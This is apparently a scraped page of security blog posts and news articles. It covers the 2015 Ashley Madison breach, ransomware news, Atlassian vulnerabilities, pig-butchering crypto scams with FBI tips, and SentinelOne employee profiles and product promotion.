We know from experience that there still exists a divide between AI and humans regarding decision-making. We should never expect AI to be intuitive, ethical, or strategic. These are areas where we inevitably still need humans in the loop. These are areas where human intellectual capital excels. We also must realize that we should never expect a human operator to be as efficient or effective at tasks such as hunting through large datasets looking for anomalies, summarizing billions of events to determine baseline trends, or testing what-if hypotheses. These are the realm where AI has a clear advantage.

AI brings the ability to gather and analyze large quantities of complex data. They can sift through oceans of information in a fraction of the time it would take a group of humans. That means the data is still timely when it is being analyzed, whereas if humans were doing it, an attack might be discovered weeks after it entered the organization. AI turns data from backward-looking into being the impetus for strategic decision-making and actionability.

Humans bring two special skills to the table. First, they can take the information machines put forward and apply intellect. They understand the context of multiple pieces of data threaded together and are much better at deciphering the subtle clues that unearth an attack.

Decision-making needs to coordinate between humans and AI, with the workload split adequately along these lines. Either side should be empowered to make decisions that affect users, devices, and applications in the real world while balancing the risks and rewards associated with each.

Conclusion

There will always be vulnerabilities, the threat landscape will continue to evolve, and the attack surface will continue to increase. As defenders, we are at a pivotal moment where we need to look into modernizing our approach to vulnerability management. The time of periodic, manual, and siloed risk assessments is no longer efficient nor scalable.

Just as we shifted from traditional signature-based security solutions to behavioral-based detection and response methodologies, so we need to modernize our approach to vulnerability management.

To learn more about how SentinelOne can help with real-time asset discovery and vulnerability management, visit Singularity Ranger.

Singularity Ranger
Network Visibility & Control. A cloud delivered, software-defined network discovery solution designed to add global network visibility and control with minimal friction.

A Retrospective on the 2015 Ashley Madison Breach

It’s been seven years since the online cheating site AshleyMadison.com was hacked and highly sensitive data about its users posted online. The leak led to the public shaming and extortion of many Ashley Madison users, and to at least two suicides. To date, little is publicly known about the perpetrators or the true motivation for the attack. But a recent review of Ashley Madison mentions across Russian cybercrime forums and far-right websites in the months leading up to the hack revealed some previously unreported details that may deserve further scrutiny.

As first reported by KrebsOnSecurity on July 19, 2015, a group calling itself the “Impact Team” released data sampled from millions of users, as well as maps of internal company servers, employee network account information, company bank details and salary information.

The Impact Team said it decided to publish the information because ALM “profits on the pain of others,” and in response to alleged lies that Ashley Madison parent firm Avid Life Media allegedly told its customers about a service that allows members to completely erase their profile information for a $19 fee.

According to the hackers, although the “full delete” feature that Ashley Madison advertises promised “removal of site usage history and personally identifiable information from the site,” users’ purchase details — including real name and address — aren’t actually scrubbed.

“Full Delete netted ALM $1.7mm in revenue in 2014. It’s also a complete lie,” the hacking group wrote. “Users almost always pay with credit card; their purchase details are not removed as promised, and include real name and address, which is of course the most important information the users want removed.”

A snippet of the message left behind by the Impact Team.

The Impact Team said ALM had one month to take Ashley Madison offline, along with a sister property called Established Men. The hackers promised that if a month passed and the company did not capitulate, it would release “all customer records, including profiles with all the customers’ secret sexual fantasies and matching credit card transactions, real names and addresses, and employee documents and emails.”

Exactly 30 days later, on Aug. 18, 2015, the Impact Team posted a “Time’s up!” message online, along with links to 60 gigabytes of Ashley Madison user data.

AN URGE TO DESTROY ALM

One aspect of the Ashley Madison breach that’s always bothered me is how the perpetrators largely cast themselves as fighting a crooked company that broke their privacy promises, and how this narrative was sustained at least until the Impact Team decided to leak all of the stolen user account data in August 2015.

Granted, ALM had a lot to answer for. For starters, after the breach it became clear that a great many of the female Ashley Madison profiles were either bots or created once and never used again. Experts combing through the leaked user data determined that fewer than one percent of the female profiles on Ashley Madison had been used on a regular basis, and the rest were used just once — on the day they were created. On top of that, researchers found 84 percent of the profiles were male.

But the Impact Team had to know that ALM would never comply with their demands to dismantle Ashley Madison and Established Men. In 2014, ALM reported revenues of $115 million. There was little chance the company was going to shut down some of its biggest money machines.

Hence, it appears the Impact Team’s goal all along was to create prodigious amounts of drama and tension by announcing the hack of a major cheating website, and then letting that drama play out over the next few months as millions of exposed Ashley Madison users freaked out and became the targets of extortion attacks and public shaming.

Robert Graham, CEO of Errata Security, penned a blog post in 2015 concluding that the moral outrage professed by the Impact Team was pure posturing.

“They appear to be motivated by the immorality of adultery, but in all probability, their motivation is that #1 it’s fun and #2 because they can,” Graham wrote.

Per Thorsheim, a security researcher in Norway, told Wired at the time that he believed the Impact Team was motivated by an urge to destroy ALM with as much aggression as they could muster.

“It’s not just for the fun and ‘because we can,’ nor is it just what I would call ‘moralistic fundamentalism,’” Thorsheim told Wired. “Given that the company had been moving toward an IPO right before the hack went public, the timing of the data leaks was likely no coincidence.”

NEO-NAZIS TARGET ASHLEY MADISON CEO

As the seventh anniversary of the Ashley Madison hack rolled around, KrebsOnSecurity went back and looked for any mentions of Ashley Madison or ALM on cybercrime forums in the months leading up to the Impact Team’s initial announcement of the breach on July 19, 2015. There wasn’t much, except a Russian guy offering to sell payment and contact information on 32 million AshleyMadison users, and a bunch of Nazis upset about a successful Jewish CEO promoting adultery.

Cyber intelligence firm Intel 471 recorded a series of posts by a user with the handle “Brutium” on the Russian-language cybercrime forum Antichat between 2014 and 2016. Brutium routinely advertised the sale of large, hacked databases, and on Jan. 24, 2015, this user posted a thread offering to sell data on 32 million Ashley Madison users:

“Data from July 2015
Total ~32 Million contacts:
full name; email; phone numbers; payment, etc.”

It’s unclear whether the postdated “July 2015” statement was a typo, or if Brutium updated that sales thread at some point. There is also no indication whether anyone purchased the information. Brutium’s profile has since been removed from the Antichat forum.

Flashpoint is a threat intelligence company in New York City that keeps tabs on hundreds of cybercrime forums, as well as extremist and hate websites. A search in Flashpoint for mentions of Ashley Madison or ALM prior to July 19, 2015 shows that in the six months leading up to the hack, Ashley Madison and its then-CEO Noel Biderman became a frequent subject of derision across multiple neo-Nazi websites.

On Jan. 14, 2015, a member of the neo-Nazi forum Stormfront posted a lively thread about Ashley Madison in the general discussion area titled, “Jewish owned dating website promoting adultery.”

On July 3, 2015, Andrew Anglin, the editor of the alt-right publication Daily Stormer, posted excerpts about Biderman from a story titled, “Jewish Hyper-Sexualization of Western Culture,” which referred to Biderman as the “Jewish King of Infidelity.”

On July 10, a mocking montage of Biderman photos with racist captions was posted to the extremist website Vanguard News Network, as part of a thread called “Jews normalize sexual perversion.”

“Biderman himself says he’s a happily married father of two and does not cheat,” reads the story posted by Anglin on the Daily Stormer. “In an interview with the ‘Current Affair’ program in Australia, he admitted that if he found out his own wife was accessing his cheater’s site, ‘I would be devastated.’”

The leaked AshleyMadison data included more than three years’ worth of emails stolen from Biderman. The hackers told Motherboard in 2015 they had 300 GB worth of employee emails, but that they saw no need to dump the inboxes of other company employees.

Several media outlets pounced on salacious exchanges in Biderman’s emails as proof he had carried on multiple affairs. Biderman resigned as CEO on Aug. 28, 2015. The last message in the archive of Biderman’s stolen emails was dated July 7, 2015 — almost two weeks before the Impact Team would announce their hack.

Biderman told KrebsOnSecurity on July 19, 2015 that the company believed the hacker was some type of insider.

“We’re on the doorstep of [confirming] who we believe is the culprit, and unfortunately that may have triggered this mass publication,” Biderman said. “I’ve got their profile right in front of me, all their work credentials. It was definitely a person here that was not an employee but certainly had touched our technical services.”

Certain language in the Impact Team’s manifesto seemed to support this theory, such as the line: “For a company whose main promise is secrecy, it’s like you didn’t even try, like you thought you had never pissed anyone off.”

But despite ALM offering a belated $500,000 reward for information leading to the arrest and conviction of those responsible, to this day no one has been charged in connection with the hack.

Fortune Names SentinelOne a Top Workplace for Millennials | Sentinels Share Why They Agree

Over 400K millennials have weighed in to determine the Fortune’s Best Workplaces for Millennials in 2022 – and SentinelOne is proud to be named as a leading employer for Millennials! With nearly 54% of our team born between 1981 and 1997, millennials are a critical part of our workforce.

We spoke to a few of our millennial teammates around the globe to understand what they liked best about the SentinelOne workplace culture. “People” were at the top of the favorites list that also included ability to make an impact working on leading-edge tech and creative offerings that support mental health and wellbeing. They also value our benefits that are aligned to the modern evolving family including the gender-neutral parental leave program and hybrid working model.

Mary Pascual, Incident Response Technical Account Manager

Mary joined SentinelOne earlier this year. Prior to joining, Mary was in cyber threat operations and was familiar with our technology, describing it as the “best in the market.” She kept a close eye on job openings at SentinelOne and applied when she saw a match for her skill set.

“Being in cybersecurity, I was familiar with the products out there,” said Mary. “After reading about the SentinelOne technology, I realized the potential. At the time I was doing manual threat hunting, and it was very tedious. I knew first-hand why the demand would be so high.”

Based in Singapore, Mary works to educate Incident Response Partners on the features and benefits of our platform.

“My job is to ensure that the Incident Response partners know how to best assist customers when there’s a breach,” said Mary. “The goal is always to have the security team extract what they need as quickly as they can and mitigate the issue.”

The tech is what attracted Mary to SentinelOne, but ask her what she loves best about working with the team, and her answers are more about the team than the amazing tech they develop.

“My team is like family,” said Mary. “I feel so valued, and I know I am making an impact. My managers and my teammates acknowledge my effort, and that is very important. We are completely empowered to do our jobs and to me, that’s everything.”

Mary also cited flexibility in her daily schedule and future opportunities for growth as reasons she loves working at SentinelOne. Her advice for others looking to break into cybersecurity is simple – learn all that you can and then go learn some more.

“Start by learning and knowing the fundamentals in networking and security,” said Mary. “Read books on cybersecurity. Invest in yourself by going to training and conferences. Once you get there, don’t just learn – network and have fun too!”

Ronnie Press, Talent Tools and Business Analyst

Ronnie has been with SentinelOne for almost two years. Ronnie enables the Talent Acquisition organization with data they need to effectively and efficiently recruit during hypergrowth.

“Data helps tell the story,” said Ronnie. “My team is heads down and completely focused on hiring. I provide the data that helps inform decisions, identify opportunities and celebrate accomplishments.”

SentinelOne is quickly approaching 2K employees, 500 of which were hired since February of this year. Ronnie describes the culture as supportive and collaborative, even with the rapid growth.

“We are such a force in the cybersecurity industry,” said Ronnie. “To be able to become a public company, hire so many people and retain a start-up soul is a huge accomplishment.”

“The company is growing fast, and there’s a huge opportunity for everyone to make an impact,” said Ronnie. “Our culture is so supportive, and it’s by far the most remote-friendly organization I’ve ever worked for.”

Ronnie attributes his overall job satisfaction to the spirit of the team he works on.

“Connection with colleagues is a huge influence on your success,” said Ronnie. “People are even more important than money, industry or company prestige. That stuff matters, but it’s not the most important thing.”

Ronnie also cites work/life balance and ability to work remotely as the top reasons he enjoys working at SentinelOne. He recently relocated to San Diego to be closer to friends and enjoy outdoor activities including playing in a basketball league and hiking.

Meriya Thomas, Staff Software Engineer

Meriya joined SentinelOne just over a year ago and cites the amazing energy for our award-winning culture.

“The positive energy can actually be felt throughout this company,” said Meriya. “It’s truly inspiring. We are open and respectful in all of our interactions. We also have a unique way of trusting each other and being open to different ideologies and opinions.”

Meriya makes her home in Chicago with her husband and 3-year old daughter. She is expecting her second child and is very grateful for SentinelOne’s gender-neutral parental leave, providing 16 weeks to all Sentinels regardless of gender, birthing status or sexual orientation.

“Time with family is so precious right after the baby is born,” said Meriya. “I am very grateful to be able to focus on my growing family without feeling pressure to return too quickly.”

Meriya works on a collaborative global team focusing on user experience. She is proud of how well her team members stay connected across multiple time zones.

“Our communication is seamless,” said Meriya. “We use innovative communication channels to build end-to-end tech docs and have discussions while writing and reviewing code. What amazes me is that we constantly enable each other to work more efficiently.”

Meriya is grateful for her ability to have an impact at work – and at home. She describes 5:30pm as “sacred” when she welcomes her daughter home from school.

“My manager is very respectful of my time, which I really appreciate,” said Meriya. “When my daughter gets home, I rarely need to open my laptop. That time is all about her.”

Meriya is also grateful to SentinelOne for caring for her wellbeing with robust benefit offerings.

“It’s not just work-work-work here,” said Meriya. “SentinelOne cares about my mental and physical well being. We have fitness challenges and masterclasses on wellbeing that I really enjoy.”

Meriya’s advice to other millennial women in tech – speak out and take advantage of all opportunities to learn and grow.

“Don’t hold back any of your opinions or ideas,” said Meriya. “Keep asking questions and keep learning on the side. Technology is evolving so fast, it’s critical to stay up to date!”

Is SentinelOne a Good Place to Work?

In addition to this Fortune ranking, SentinelOne has received a number of other recent accolades highlighting our best-in-class culture, including:

  • INC. Best Workplaces 2022
  • Fortune Best Workplaces in the Bay Area 2022
  • Best Workplaces in the Netherlands 2022
  • Best Workplaces in the UK 2022
  • Best Workplaces for Wellbeing in the UK 2022
  • The Bay Area’s Best Places To Work 2022
  • Comparably Best Company Outlook 2022
  • Comparably Best Company For Global Culture 2022
  • Comparably Best Company in the Bay Area 2022
  • Comparably Best Company for Career Growth 2022
  • Comparably Best CEOs for Women 2022
  • Comparably Best CEOs for Diversity 2022
  • Comparably Best Sales Team 2022
  • Comparably Best Engineering Team 2022

To learn more about our award-winning culture and job opportunities, visit our careers page.

The Good, the Bad and the Ugly in Cybersecurity – Week 30

The Good

This week, the Justice Department announced that they had disrupted the activities of a group of North Korean state-sponsored threat actors that targeted healthcare facilities in 2021, successfully seizing and returning approximately $500,000 of ransom money to the victims.

In a keynote address at the International Conference on Cyber Security, U.S. Deputy Attorney General Lisa Monaco walked through the two incidents in which a ransomware group affiliated with the North Korean government targeted healthcare organizations based in Colorado and Kansas with Maui ransomware.

According to Monaco, the FBI and DOJ first encountered Maui ransomware during the Kansas-based incident. The state-sponsored threat actors encrypted the Kansas hospital’s servers and left a ransom note warning hospital administrators that the ransom would double if it was not paid in 48 hours.

However, when the hospital paid the ransom to give their patients the care they needed quickly, they also notified the FBI, which worked with the DOJ to trace the ransom payments using tactics from their investigations on the Colonial Pipeline attack. Law enforcement traced the funds back to Chinese money launderers that frequently aid North Korean threat actors in transferring funds and from this discovery, identified relevant breaches with the Colorado-based medical provider and potential victims overseas.

According to the Deputy Attorney General, recovery of the funds and identification of the Maui ransomware strain directly resulted from the Kansas’ hospital’s rapid disclosure. We hope this major victory encourages other enterprises and organizations to disclose incidents and contribute to ongoing investigations.

The Bad

Researchers have released new information surrounding the Conti ransomware gang’s attack on the Costa Rican government.

A report from investigators broke down each action the threat actors behind Conti ransomware took over five days to compromise Costa Rica’s government.

First, the cybercriminals gained access to the Costa Rican Ministry of Finance’s systems over a VPN connection, using credentials that were exfiltrated from a previous malware attack. After setting up and executing over 10 Cobalt Strike beacons and gaining local network domain administrator access, Conti ransomware operators scanned the Costa Rican government’s network, moved laterally and exfiltrated credentials using Mimikatz. To establish persistence, the threat actors also downloaded Atera’s remote access tool on less active environments before completing data exfiltration.

The Conti gang demanded that the Costa Rican government pay a $10 million ransom, which the gang then doubled after the government declined to pay. Because the Conti operators had successfully targeted multiple government offices, the breach triggered a national emergency that took over a month to remediate and was Conti’s final attack using its current branding. After this attack, the ransomware gang shut down their leak sites, and its members scattered to other groups of threat actors.

In the fallout of Conti’s final operation, we’re left with a sobering reminder that although a ransomware gang can shut down, it’s more than likely that the threat actors and technology behind these devastating attacks can emerge under a new name to target innocent people and organizations again.

The Ugly

This week, Atlassian disclosed three vulnerabilities, two of which are considered critical flaws that impact almost all of their products.

In two security advisories published on July 20th, the popular software firm disclosed “Servlet Filter dispatcher vulnerabilities” that impact users of Bamboo, Bitbucket, Confluence, Crucible, Fisheye, and Jira.

The first critical vulnerability, tracked as CVE-2022-26136, allows threat actors to bypass custom servlet filters for third-party applications to use in enforcing authentication. Attackers can exploit this vulnerability to trick users into sending a malicious HTTP request which bypasses a servlet filter designed to validate Atlassian’s “Gadget” modules. These HTTP requests are capable of executing arbitrary JavaScript in a victim’s browser.

The second critical vulnerability, CVE-2022-26137, could allow a remote, unauthenticated attacker to invoke additional servlet filters when an application processes requests. Atlassian’s advisory also warned that attackers could bypass servlet filters related to cross-origin resource sharing (CORS) requests and access a vulnerable application using the victim’s permissions.

The final flaw impacts Confluence users. Questions for Confluence, one of the platform’s apps, creates a Confluence user account when a user enables it on Confluence Server or Data Center. This account uses hardcoded credentials and is designed to support cloud migrations. According to Atlassian’s advisory, the hardcoded credentials were leaked on Twitter and an unauthenticated attacker could use the information to access the app’s user account and any content accessible to members of the “confluence-users” group.

While Atlassian discloses more information about these vulnerabilities and rolls out patches, we would urge enterprise customers to follow the mitigation recommendations outlined in the company’s advisories.

Massive Losses Define Epidemic of ‘Pig Butchering’

U.S. state and federal investigators are being inundated with reports from people who’ve lost hundreds of thousands or millions of dollars in connection with a complex investment scam known as “pig butchering,” wherein people are lured by flirtatious strangers online into investing in cryptocurrency trading platforms that eventually seize any funds when victims try to cash out.

The term “pig butchering” refers to a time-tested, heavily scripted, and human-intensive process of using fake profiles on dating apps and social media to lure people into investing in elaborate scams. In a more visceral sense, pig butchering means fattening up a prey before the slaughter.

“The fraud is named for the way scammers feed their victims with promises of romance and riches before cutting them off and taking all their money,” the Federal Bureau of Investigation (FBI) warned in April 2022. “It’s run by a fraud ring of cryptocurrency scammers who mine dating apps and other social media for victims and the scam is becoming alarmingly popular.”

As documented in a series of investigative reports published over the past year across Asia, the people creating these phony profiles are largely men and women from China and neighboring countries who have been kidnapped and trafficked to places like Cambodia, where they are forced to scam complete strangers over the Internet — day after day.

The most prevalent pig butchering scam today involves sophisticated cryptocurrency investment platforms, where investors invariably see fantastic returns on their deposits — until they try to withdraw the funds. At that point, investors are told they owe huge tax bills. But even those who pay the phony levies never see their money again.

The come-ons for these scams are prevalent on dating sites and apps, but they also frequently start with what appears to be a wayward SMS — such as an instant message about an Uber ride that never showed. Or a reminder from a complete stranger about a planned meetup for coffee. In many ways, the content of the message is irrelevant; the initial goal to simply to get the recipient curious enough to respond in some way.

Those who respond are asked to continue the conversation via WhatsApp, where an attractive, friendly profile of the opposite gender will work through a pre-set script that is tailored to their prey’s apparent socioeconomic situation. For example, a divorced, professional female who responds to these scams will be handled with one profile type and script, while other scripts are available to groom a widower, a young professional, or a single mom.

‘LIKE NOTHING I’VE SEEN BEFORE’

That’s according to Erin West, deputy district attorney for Santa Clara County in Northern California. West said her office has been fielding a large number of pig butchering inquiries from her state, but also from law enforcement entities around the country that are ill-equipped to investigate such fraud.

“The people forced to perpetrate these scams have a guide and a script, where if your victim is divorced say this, or a single mom say this,” West said. “The scale of this is so massive. It’s a major problem with no easy answers, but also with victim volumes I’ve never seen before. With victims who are really losing their minds and in some cases are suicidal.”

West is a key member of REACT, a task force set up to tackle especially complex forms of cyber theft involving virtual currencies. West said the initial complaints from pig butchering victims came early this year.

“I first thought they were one-off cases, and then I realized we were getting these daily,” West said. “A lot of them are being reported to local agencies that don’t know what to do with them, so the cases languish.”

West said pig butchering victims are often quite sophisticated and educated people.

“One woman was a university professor who lost her husband to COVID, got lonely and was chatting online, and eventually ended up giving away her retirement,” West recalled of a recent case. “There are just horrifying stories that run the gamut in terms of victims, from young women early in their careers, to senior citizens and even to people working in the financial services industry.”

In some cases reported to REACT, the victims said they spent days or weeks corresponding with the phony WhatsApp persona before the conversation shifted to investing.

“They’ll say ‘Hey, this is the food I’m eating tonight’ and the picture they share will show a pretty setting with a glass of wine, where they’re showcasing an enviable lifestyle but not really mentioning anything about how they achieved that,” West said. “And then later, maybe a few hours or days into the conversation, they’ll say, ‘You know I made some money recently investing in crypto,’ kind of sliding into the topic as if this wasn’t what they were doing the whole time.”

Curious investors are directed toward elaborate and official-looking online crypto platforms that appear to have thousands of active investors. Many of these platforms include extensive study materials and tutorials on cryptocurrency investing. New users are strongly encouraged to team up with more seasoned investors on the platform, and to make only small investments that they can afford to lose.

The now-defunct homepage of xtb-market[.]com, a scam cryptocurrency platform tied to a pig butchering scheme.

“They’re able to see some value increase, and maybe even be allowed to take out that value increase so that they feel comfortable about the situation,” West said. Some investors then need little encouragement to deposit additional funds, which usually generate increasingly higher “returns.”

West said many crypto trading platforms associated with pig butchering scams appear to have been designed much like a video game, where investor hype is built around upcoming “trading opportunities” that hint at even more fantastic earnings.

“There are bonus levels and VIP levels, and they’ll build hype and a sense of frenzy into the trading,” West said. “There are definitely some psychological mechanisms at work to encourage people to invest more.”

“What’s so devastating about many of the victims is they lose that sense of who they are,” she continued. “They thought they were a savvy, sophisticated person, someone who’s sort of immune to scams. I think the large scale of the trickery and psychological manipulation being used here can’t be understated. It’s like nothing I’ve seen before.”

A $5,000,000 LOSS

Courtney Nolan, a divorced mother of three daughters, says she lost more than $5 million to a pig butchering scam. Nolan lives in St. Louis and has a background in investment finance, but only started investing in cryptocurrencies in the past year.

Nolan’s case may be especially bad because she was already interested in crypto investing when the scammer reached out. At the time, Bitcoin was trading at or near all-time highs of nearly $68,000 per coin.

Nolan said her nightmare began in late 2021 with a Twitter direct message from someone who was following many of the same cryptocurrency influencers she followed. Her fellow crypto enthusiast then suggested they continue their discussion on WhatsApp. After much back and forth about his trading strategies, her new friend agreed to mentor her on how to make reliable profits using the crypto trading platform xtb.com.

“I had dabbled in leveraged trading before, but his mentor program gave me over 100 pages of study materials and agreed to walk me through their investment strategies over the course of a year,” Nolan told KrebsOnSecurity.

Nolan’s mentor had her create an account website xtb-market[.]com, which was made to be confusingly similar to XTB’s official platform. The site promoted several different investment packages, including a “starter plan” that involves a $5,250 up-front investment and promises more than 15 percent return across four separate trading bursts.

Platinum plans on xtb-market promised a whopping 45 percent ROI, with a minimum investment of $265,000. The site also offered a generous seven percent commission for referrals, which encouraged new investors to recruit others.

The now-defunct xtb-market[.]com.

While chatting via WhatsApp, Nolan and her mentor would trade side by side in xtb-market, initially with small investments ranging from $500 to $5,000. When those generated hefty returns, Nolan made bigger deposits. On several occasions she was able to withdraw amounts ranging from $10,000 to $30,000.

But after investing more than $4.5 million of her own money over nearly four months, Nolan found her account was suddenly frozen. She was then issued a tax statement saying she owed nearly $500,000 in taxes before she could reactivate her account or access her funds.

Nolan said it seems obvious in hindsight that she should never have paid the tax bill. Because xtb-market and her mentor cut all communications with her after that, and the entire website disappeared just a few weeks later.

Justin Maile, an investigation partner manager at Chainalysis, told Vice News that the tax portion of the pig butchering scam relies on the “sunk costs fallacy,” when people are reluctant to abandon a failing strategy or course of action because they have already invested heavily in it.

“Once the victim starts getting skeptical or tries to withdraw their funds, they are often told that they have to pay tax on the gains before funds can be unlocked,” Maile told Vice News. “The scammers will try to get any last payments out of the victims by exploiting the sunk cost fallacy and dangling huge profits in front of them.”

Vice recently published an in-depth report on pig butchering’s link to organized crime gangs in Asia that lure young job seekers with the promise of customer service jobs in call centers. Instead, those who show up at the appointed place and time are taken on long car rides and/or forced hikes across the borders into Cambodia, where they are pressed into indentured servitude.

Vice found many of the people forced to work in pig-butchering scams are being held in Chinese-owned casinos operating in Cambodia. Many of those casinos were newly built when the Covid pandemic hit. As the new casinos and hotels sat empty, organized crime groups saw an opportunity to use these facilities to generate huge income streams, and many foreign travelers stranded in neighboring countries were eventually trafficked to these scam centers.

Vice reports:

“While figures on the number of people in scam centers in Cambodia is unknown, best estimates pieced together from various sources point to the tens of thousands across scam centers in Sihanoukville, Phnom Penh, and sites in border regions Poipet and Bavet. In April, Thailand’s assistant national police commissioner said 800 Thai citizens had been rescued from scam centers in Cambodia in recent months, with a further 1,000 citizens still trapped across the country. One Vietnamese worker estimated 300 of his compatriots were held on just one floor in a tall office block hosting scam operations.”

“…within Victory Paradise Resort alone there were 7,000 people, the majority from mainland China, but also Indonesians, Singaporeans and Filipinos. According to the Khmer Times, one 10-building complex of high-rises in Sihanoukville, known as The China Project, holds between 8,000 to 10,000 people participating in various scams—a workforce that would generate profits around the $1 billion mark each year at $300 per worker per day.”

THE KILLING FLOOR

REACTs’ West said while there are a large number of pig butchering victims reporting their victimization to the FBI, very few are receiving anything more than instructions about filing a complaint with the FBI’s Internet Crime Complaint Center (IC3), which keeps track of cybercrime losses and victims.

“There’s a huge gap in victims that are seeing any kind of service at all, where they’re reporting to the FBI but not being able to talk to anyone,” she said. “They’re filling out the IC3 form and never hearing back. It sort of feels like the federal government is ignoring this, so people are going to local agencies, which are sending these victims our way.”

For many younger victims of pig butchering, even losses of a few thousand dollars can be financially devastating. KrebsOnSecurity recently heard from two different readers who said they were in their 20s and lost more than $40,000 each when the investment platforms they were trading on vanished with their money.

The FBI can often bundle numerous IC3 complaints involving the same assailants and victims into a single case for federal prosecutors to pursue the guilty, and/or try to recapture what was stolen. In general, however, victims of crypto crimes rarely see that money again, or if they do it can take many years.

“The next piece is what can we actually do with these cases,” West said. “We used to frame success as getting bad people behind bars, but these cases leave us as law enforcement with not a lot of opportunity there.”

West said the good news is U.S. authorities are seeing some success in freezing cryptocurrency wallets suspected of being tied to large-scale cybercriminal operations. Indeed, Nolan told KrebsOnSecurity that her losses were substantial enough to warrant an official investigation by the FBI, which she says has since taken steps to freeze at least some of the assets tied to xtb-market[.]com.

Likewise, West said she was recently able to freeze cryptocurrency funds stolen from some pig butchering victims, and now REACT is focusing on helping state and local authorities learn how to do the same.

“It’s important to be able to mobilize quickly and know how to freeze and seize crypto and get it back to its rightful owner,” West said. “We definitely have made seizures in cases involving pig butchering, but we haven’t gotten that back to the rightful owners yet.”

In April, the FBI warned Internet users to be on guard against pig butchering scams, which it said attracts victims with “promises of romance and riches” before duping them out of their money. The IC3 said it received more than 4,300 complaints related to crypto-romance scams, resulting in losses of more than $429 million.

Here are some common elements of a pig butchering scam:

Dating apps: Pig-butchering attempts are common on dating apps, but they can begin with almost any type of communication, including SMS text messages.
WhatsApp: In virtually all documented cases of pig butchering, the target is moved fairly quickly into chatting with the scammer via WhatsApp.
No video: The scammers will come up with all kinds of excuses not to do a video call. But they will always refuse.
Investment chit-chat: Your contact (eventually) claims to have inside knowledge about the cryptocurrency market and can help you make money.

The FBI’s tips on avoiding crypto scams:

-Never send money, trade, or invest based on the advice of someone you have only met online.
-Don’t talk about your current financial status to unknown and untrusted people.
-Don’t provide your banking information, Social Security Number, copies of your identification or passport, or any other sensitive information to anyone online or to a site you do not know is legitimate.
-If an online investment or trading site is promoting unbelievable profits, it is most likely that—unbelievable.
-Be cautious of individuals who claim to have exclusive investment opportunities and urge you to act fast.

EDR for Cloud Workloads Running on AWS Graviton

SentinelOne is pleased to announce its EDR for cloud workloads has achieved the AWS Graviton Ready Designation for the AWS Graviton3 processor. AWS Graviton Ready solutions are vetted by AWS Partner Solution Architects to ensure customers have a consistent experience. As part of the AWS Graviton Ready Program, SentinelOne stands ready to help customers secure their Linux-based and containerized workloads, defending them from runtime threats such as cryptojacking malware and ransomware.

Graviton3 will be a boon for compute-intensive cloud workloads. Let’s start first with a brief intro to Graviton3, and then dive into the role of EDR in a multi-layered cloud security strategy.

A Brief Overview of Graviton3

The Graviton3 processor is AWS’ 7th generation processor and is the second generation to use the arm64 architecture. EC2 instances based on Graviton3 have several advantages which make them ideal for compute-intensive workloads, namely higher performance and lower power consumption.

Graviton3 delivers 25% improvement in performance when compared to its 6th gen predecessor Graviton2, which itself realized a 40% improvement over the 5th generation x86 CPU. Graviton3 also delivers 2x memory speed with its use of DDR5 memory.

Graviton3 also uses up to 60% less energy. For those organizations focused on reducing their carbon footprint while accelerating their digital transformation, Graviton3 is an attractive choice.

Cloud Rising, Cloud Defense-in-Depth

Cloud IaaS is projected to reach $120 billion in 2022, according to Gartner. That’s up about 30% Year-on-Year as organizations of all sizes continue to expand their cloud spend. To punctuate the point that “organizations of all sizes” applies, consider that over half of SMBs spend at least $1.2 million on cloud annually, whereas 37% of enterprises spend 10x that amount. And cloud security, for the 10th time in the last 11 years, remains the top concern of IT executives, at 85%.

Pause and consider that combination for a moment: everyone is concerned about cloud security and is accelerating their cloud spend despite those concerns. Innovation is king, and business operations depend upon the confidentiality, availability, and integrity of cloud workloads. This is where EDR for cloud workloads fits in, and it’s where a cloud defense-in-depth strategy begins to take shape.

Of course, image scanning is ubiquitous. Practically everyone is, and rightly should be, taking this necessary step, and there are any number of solutions out there. But image scanning alone is not enough. If it were, cloud security would not remain consistently atop the list of concerns of IT executives – remember, 10 of the last 11 years it was the topmost concern.

Defense-in-depth is required. In addition to image scanning, additional security layers of IAM (Identity and Access Management), cloud-native architecture, configuration management, and EDR each play important, complementary roles. It’s not any element in isolation, but the combination of all the layers that makes for robust security. And this robust cloud defense-in-depth strategy must not stand in the way of innovation.

EDR for Cloud Workloads

After you’ve scanned for software vulns, architected an elegant workload, applied IAM roles, and are managing the configuration of cloud resources like compute instances, cloud storage, virtual private clouds, and so on, you promote your workload to production. EDR is the last line of defense, hardening your cloud workloads against the threat of malware like cryptominers and ransomware, while enabling you to innovate quickly, and securely.

  • Crypto mining malware. Crypto mining is computationally intensive and costly, using an estimated 25% of a CPU’s processing capacity. Threat actors install malware on your cloud infrastructure to hijack/steal compute power – they keep the crypto currency, you keep the bill. This process is called cryptojacking. According to a report from Google Cybersecurity Action Team in Nov 2021, in a sample of cloud compute instances, 86% had malware used to mine cryptocurrency. Similarly, Cisco reported that in 2020 an estimated 70% of its customers were victims of crypto mining malware.

    EDR solutions like that from SentinelOne can detect the crypto mining malware and stop it in its tracks. With SentinelOne, you can continue to innovate quickly with the confidence that our EDR is your backstop, using AI to detect and kill rogue processes like crypto miners and ransomware.

  • Vulnerability exploits. Consider also the Log4j vulnerability (CVE-2021-44228) announced in December 2021. Soon after its announcement, threat actors began scanning for publicly-exposed cloud servers which were vulnerable. Despite the late month, Log4j was the second most exploited vulnerability in 2021. Here again, EDR can prove a robust defense.
  • Linux ransomware. Ransomware is not just for Windows workstations. There was a 146% increase in Linux ransomware code variants in 2021. Threat actors know that cloud is big business, and they are turning all the door knobs to see who left the front door to their cloud enterprise unlocked. EDR with behavioral AI can detect such machine-speed attacks in real-time, to stop the evil in its tracks.

Parting Thoughts

None of this is intended as doom, gloom, or FUD. We do, however, look at threats and threat actors with clear eyes. Like you, our cloud journey continues to accelerate. To minimize risk, we use a robust, multi-layered defense-in-depth strategy that includes our own high-performant, efficient, and scalable EDR solution. Our agent supports 13 major Linux distributions and is trusted by many of the world’s most well-known brands. We would welcome the opportunity to earn the right to protect your brand as well.

Are you headed to AWS re:Inforce 2022? Let’s meet! We would love to discuss your own cloud journey, and how SentinelOne can protect your cloud workloads, including those running on EC2 instances using AWS Graviton3.

Or, if you will not be there, please visit Singularity Cloud to learn more or request a demo.